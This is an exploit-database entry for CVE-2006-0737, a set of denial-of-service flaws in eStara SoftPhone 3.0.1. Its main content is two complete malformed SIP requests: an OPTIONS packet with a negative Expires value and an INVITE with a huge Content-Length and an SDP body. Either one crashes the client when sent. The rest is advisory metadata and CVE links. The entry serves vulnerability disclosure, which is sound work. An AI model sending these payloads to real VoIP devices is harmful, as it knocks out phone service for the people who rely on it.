Lucene search
ZwelLEDB-ID:27211HistoryFeb 14, 2006 - 12:00 a.m.
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
2006-02-1400:00:00
ZwelL
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:[email protected]>;tag=1793
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:[email protected]>;tag=2386
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111
v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000Related
prion
prion
Design/Logic Flaw
2006-02-17 01:02:00
nvd
nvd
CVE-2006-0737
2006-02-17 01:02:00
cvelist
cvelist
CVE-2006-0737
2006-02-17 01:00:00
cve
cve
CVE-2006-0737
2006-02-17 01:02:00